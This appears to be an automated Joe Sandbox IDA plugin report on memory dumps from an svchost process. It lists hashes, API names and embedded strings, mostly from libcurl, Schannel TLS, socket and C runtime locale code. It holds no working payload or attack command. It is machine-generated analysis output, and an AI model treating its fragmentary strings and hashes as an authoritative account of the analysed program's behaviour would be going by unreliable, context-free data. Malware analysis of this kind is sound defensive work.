                                                                • String ID: $ $$$(memory blob)$(unknown)$@$AES$CHACHA20_POLY1305$ChainingModeCCM$ChainingModeGCM$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: All available TLS 1.3 ciphers were disabled$schannel: Failed setting algorithm cipher list$schannel: Failed to get certificate from file %s, last error is 0x%lx$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%lx$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %lx %s, last error is 0x%lx$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: This version of Schannel does not support setting an algorithm cipher list and TLS 1.3 cipher list at the same time$schannel: Unknown TLS 1.3 cipher: %.*s$schannel: WARNING: This version of Schannel may negotiate a less-secure TLS version than TLS 1.3 because the user set an algorithm cipher list.$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                                                                • API String ID: 3799942571-230586194
                                                                • Opcode ID: 64750cf7fc75ecf1a52b74ce0a571676b61e8a684627b3f2986ccd449495d6e1
                                                                • Instruction ID: 0567e7d9c4d39772a308cfc91562ba82225d042035ea54c94e5c4c716df1d71f
                                                                • Opcode Fuzzy Hash: 64750cf7fc75ecf1a52b74ce0a571676b61e8a684627b3f2986ccd449495d6e1
                                                                • Instruction Fuzzy Hash: C1929139608B4185FB328FA5E8903EDA7B0B746FD8F844115DA6E47BA5FB78C644E700

                                                                Control-flow Graph

                                                                • Graph for the code starting at 173d01a6b50 (legend: Executed / Not Executed)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %u/%d/%s$Allowing DoH to override max connection limit$NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
                                                                • API String ID: 0-2902238462
                                                                • Opcode ID: 2b05b9d7d767020b8d379a144df4db33f2fea9fa66fb0a38a5545a4e1ad473dc
                                                                • Instruction ID: 0e063f906104429761d4ad894316edb5073df14ba151284cf1b8e3b3f50dd596
                                                                • Opcode Fuzzy Hash: 2b05b9d7d767020b8d379a144df4db33f2fea9fa66fb0a38a5545a4e1ad473dc
                                                                • Instruction Fuzzy Hash: F2427D3A208B8086EB668FA1D8403EDA7B4F745FC8F8841259EAD57395EF34D752E310

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartupfreemallocwcspbrk
                                                                • String ID: AddDllDirectory$LoadLibraryExW$if_nametoindex$iphlpapi.dll$kernel32
                                                                • API String ID: 2084031714-2297675747
                                                                • Opcode ID: 25d10e906bd9ae6e16c691fc1285ab9041ef61e00e4e74a3fa809b4385e8702e
                                                                • Instruction ID: d89eefaf6277abac34df1c6639383e2825787af885ce3e4ff0f2bcfa08471bbf
                                                                • Opcode Fuzzy Hash: 25d10e906bd9ae6e16c691fc1285ab9041ef61e00e4e74a3fa809b4385e8702e
                                                                • Instruction Fuzzy Hash: 6F61AF39208A8585FA719B95E4553EAE3B1FB49FD0FC84025D9BE037A4FF78C606A710

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: inet_pton$SimpleString::operator=inet_ntop
                                                                • String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
                                                                • API String ID: 1960554822-2421204314
                                                                • Opcode ID: 0edaa2b13891c3644038c0d754203b9f17ad93a6b24d923121f716e7c7c04ea3
                                                                • Instruction ID: 3efe34afd428d68072e5196a52b9a2cab66ad0f00d8bbc20fbb4213fb9113e50
                                                                • Opcode Fuzzy Hash: 0edaa2b13891c3644038c0d754203b9f17ad93a6b24d923121f716e7c7c04ea3
                                                                • Instruction Fuzzy Hash: B3E1BA7A608A9086FB258BA5D5403EDA7B1B784FD8F848215CE2D0B795EF78C646A300

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: socket$acceptbindconnectgetsocknamehtonllistensendsetsockopt
                                                                • String ID:
                                                                • API String ID: 3053784475-0
                                                                • Opcode ID: d062e0d662efabfd737838c303d0ff00aeb29085ae0e7c2932690540158412af
                                                                • Instruction ID: d98de5e3dda8299e8c6fc60c8d8a14f8075955558e0fb1c99debac763a280d5c
                                                                • Opcode Fuzzy Hash: d062e0d662efabfd737838c303d0ff00aeb29085ae0e7c2932690540158412af
                                                                • Instruction Fuzzy Hash: 5F819E79708A4085F7309BB5E4903DDA3B1F745FA8F904311DEBE46AE8EB78964AD300
                                                                APIs
                                                                  • Part of subcall function 00000173CFC36700: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00000173CFC03B13,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00000173CFC3670F
                                                                  • Part of subcall function 00000173CFC0F5D0: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000173CFC33E56,?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FD86), ref: 00000173CFC0F61C
                                                                • _W_Gettnames.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FDA8), ref: 00000173CFC24935
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FDA8), ref: 00000173CFC2494A
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FDA8), ref: 00000173CFC24958
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$Gettnames_lock_localesrealloc
                                                                • String ID:
                                                                • API String ID: 3705959680-0
                                                                • Opcode ID: bde4317cab3e174679989bb75934b8180b35db1ba5c292bc93aa4c3750b7d610
                                                                • Instruction ID: 23cefbe54e66f54e232ebefe8284cc637f7fb959b227bfede954a2d12f22b281
                                                                • Opcode Fuzzy Hash: bde4317cab3e174679989bb75934b8180b35db1ba5c292bc93aa4c3750b7d610
                                                                • Instruction Fuzzy Hash: 1C823D73709A0286EB53DB21D8903E923B1E754B84F44C827D9AE677A6DF38D685F340
                                                                APIs
                                                                  • Part of subcall function 00000173CFC36700: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00000173CFC03B13,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00000173CFC3670F
                                                                • _Gettnames.API-MS-WIN-CRT-TIME-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FD86,?,?,?,?,?,?,?,00000173CFC0F707), ref: 00000173CFC33DBF
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FD86,?,?,?,?,?,?,?,00000173CFC0F707), ref: 00000173CFC33DD4
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FD86,?,?,?,?,?,?,?,00000173CFC0F707), ref: 00000173CFC33DE3
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$Gettnames_lock_locales
                                                                • String ID:
                                                                • API String ID: 2001668406-0
                                                                • Opcode ID: e95d6d510b83beebbd72d37d6b8ab9e38edb898b73e1c8218507de7eafeb0eef
                                                                • Instruction ID: a4b6d37e0288935f980080ede5a58b0416441fa658575caa5f4fd52f6a9cdc4d
                                                                • Opcode Fuzzy Hash: e95d6d510b83beebbd72d37d6b8ab9e38edb898b73e1c8218507de7eafeb0eef
                                                                • Instruction Fuzzy Hash: C7323E3730DA0285EB539B11E8943D927B1B744BC8F58C82799EE677A5DE38C689F340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Locale$Info$DownlevelName__crt
                                                                • String ID:
                                                                • API String ID: 1619744293-0
                                                                • Opcode ID: b47bfe36b4610959a40c36704843bb26be612e2c5ad8ea35484c623aa9777f44
                                                                • Instruction ID: d1c73630798a481f725db49e479e5decbc49bf7d9cd5b4f50d84487b455c7622
                                                                • Opcode Fuzzy Hash: b47bfe36b4610959a40c36704843bb26be612e2c5ad8ea35484c623aa9777f44
                                                                • Instruction Fuzzy Hash: 31E06533708B81C2EB415B55F44029AA670B788BC8F648916DFBD23B55CF28CA02D744

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$setsockopt$_errno$CountCounterPerformanceQueryTickgetsocknamegetsockopthtonsinet_ntop
                                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SO_KEEPALIVE on fd %qd: errno %d$Failed to set TCP_KEEPCNT on fd %qd: errno %d$Failed to set TCP_KEEPIDLE on fd %qd: errno %d$Failed to set TCP_KEEPINTVL on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
                                                                • API String ID: 1107047317-1591695899
                                                                • Opcode ID: 65f48f47c895eec88dc286f94f2bb468524a817aeeb304b407c6ebe9008bb1c6
                                                                • Instruction ID: 96445d2accaf37f7682ac89272f3a8b06389d2415cd8434da7bdb376c01ac91e
                                                                • Opcode Fuzzy Hash: 65f48f47c895eec88dc286f94f2bb468524a817aeeb304b407c6ebe9008bb1c6
                                                                • Instruction Fuzzy Hash: B5D18B3920C68086E730DBA1E4497EEA3B1F786FC4F805211EA6D4BB91FB79C645E700

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Certmalloc$CertificateContextFreefreememmove$ErrorLastNameString_errnomemsetrealloc
                                                                • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                                                • API String ID: 726578228-413892695
                                                                • Opcode ID: dceadbc88c61df8f0e941d432596c493b93759fc88e510aa60893e4e021862c5
                                                                • Instruction ID: cc4c119459f9bc1b9be6bc5dd0b201e4446ce92e1943897df5db3090ec1ac940
                                                                • Opcode Fuzzy Hash: dceadbc88c61df8f0e941d432596c493b93759fc88e510aa60893e4e021862c5
                                                                • Instruction Fuzzy Hash: 13027D7A20978086EB72DFA5E4443EAA7B0F746FC4FC44015EA6E47B94EB78C645E700

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                                                                • API String ID: 3939687465-2168394622
                                                                • Opcode ID: e510bd89133b98551c2ded33f339925ccf4eb4118a24304ddea983bd7d095df7
                                                                • Instruction ID: 544b64602be8c933e62e23b458180b0e8d622f84f7117130510cf42fe0692c4c
                                                                • Opcode Fuzzy Hash: e510bd89133b98551c2ded33f339925ccf4eb4118a24304ddea983bd7d095df7
                                                                • Instruction Fuzzy Hash: 3A5156BD21C64496FA759B85F8843E9E2B1B348FC8FC85015E9BE02691FB38C745F210

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$CriticalSection$closesocket$_errno_strdup$DeleteEnterInitializeLeavecallocmallocsocket
                                                                • String ID:
                                                                • API String ID: 941918121-0
                                                                • Opcode ID: f7b7d5e47d6d708bd0e22812e4ed0cd66e6031231705c6cb0dfdc9715a5c2e24
                                                                • Instruction ID: f8a1249b4c89a1836737d4a80280e31f7e3b694c0c6d8798c8eda25d5f4f1c3c
                                                                • Opcode Fuzzy Hash: f7b7d5e47d6d708bd0e22812e4ed0cd66e6031231705c6cb0dfdc9715a5c2e24
                                                                • Instruction Fuzzy Hash: C8814C3A505B8086E634DBA1E8543AEB370F799BA4F445315DBBE077A1EF78E294D300

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersionmemmove$ErrorLast_errnocallocfreememset
                                                                • String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                                                • API String ID: 3185706071-3097429119
                                                                • Opcode ID: 8a031a964fd8ab912a4284cec04f5126e57061bfdf8df424aa37bbdfd8a01d6c
                                                                • Instruction ID: 1c8ab6b178335d59701e3f05246e5a8f64825e96a79ae3e325994a41e5a194e2
                                                                • Opcode Fuzzy Hash: 8a031a964fd8ab912a4284cec04f5126e57061bfdf8df424aa37bbdfd8a01d6c
                                                                • Instruction Fuzzy Hash: 5CD1593A608B408AFB219FA5E8403DEB7B4F746BC8F804015DA5E17B95EB78C655E740

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdupcallocfreestrncmp
                                                                • String ID: Could not resolve %s: %s$Failed to resolve %s '%s' with timeout after %lld ms$Unix socket path too long: '%s'$anonymous$host$localhost/$proxy
                                                                • API String ID: 2270677362-4063513385
                                                                • Opcode ID: 07ecf09e9642a1d10960b7bf778c044a930d759cebb79cc3b74f6d8eac5074ee
                                                                • Instruction ID: 4e2ac8d9b3097b46ddd416f456de6acb53454c8f53b0a49a085e5ea55fba6273
                                                                • Opcode Fuzzy Hash: 07ecf09e9642a1d10960b7bf778c044a930d759cebb79cc3b74f6d8eac5074ee
                                                                • Instruction Fuzzy Hash: 5A51A23920DA8086FB758BA5D4003E9A771F741FC8F884025EE6D5B795FB39CA86E740

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CounterPerformanceQuery
                                                                • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
                                                                • API String ID: 2783962273-3359130258
                                                                • Opcode ID: 0c326179b19429aad917b0afc1b3ccf9519d9a8f9c5be530e1f2f89f467c6228
                                                                • Instruction ID: 22de290a7b06b0d043c285845593329825030357a2ea3c9f1941a83cc82ae4f7
                                                                • Opcode Fuzzy Hash: 0c326179b19429aad917b0afc1b3ccf9519d9a8f9c5be530e1f2f89f467c6228
                                                                • Instruction Fuzzy Hash: AD328C36B08AC08AFB218FE5D5453ECA3B1B745F98F844215DE6D2BB99EB30C652D340

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00000173CFC3A1A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00000173CFC06283), ref: 00000173CFC3A1C0
                                                                  • Part of subcall function 00000173CFC3A1A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00000173CFC06283), ref: 00000173CFC3A1C8
                                                                  • Part of subcall function 00000173CFC3A1A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00000173CFC06283), ref: 00000173CFC3A1D1
                                                                  • Part of subcall function 00000173CFC3A1A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00000173CFC06283), ref: 00000173CFC3A1ED
                                                                • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000173CFC19F7E), ref: 00000173CFC161D9
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000173CFC19F7E), ref: 00000173CFC161F6
                                                                • _Maklocstr.LIBCPMT ref: 00000173CFC16212
                                                                • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000173CFC19F7E), ref: 00000173CFC1621B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000173CFC19F7E), ref: 00000173CFC16238
                                                                • _Maklocstr.LIBCPMT ref: 00000173CFC16254
                                                                • _Maklocstr.LIBCPMT ref: 00000173CFC16269
                                                                  • Part of subcall function 00000173CFC04F40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173CFC11F54,?,?,?,00000173CFC0464B,?,?,?,00000173CFC05D21), ref: 00000173CFC04F62
                                                                  • Part of subcall function 00000173CFC04F40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173CFC11F54,?,?,?,00000173CFC0464B,?,?,?,00000173CFC05D21), ref: 00000173CFC04F88
                                                                  • Part of subcall function 00000173CFC04F40: memmove.VCRUNTIME140(?,?,?,00000173CFC11F54,?,?,?,00000173CFC0464B,?,?,?,00000173CFC05D21), ref: 00000173CFC04FA0
                                                                Strings
                                                                • :AM:am:PM:pm, xrefs: 00000173CFC16262
                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00000173CFC16201
                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00000173CFC16243
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Maklocstrfree$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemmove
                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                • API String ID: 269533641-35662545
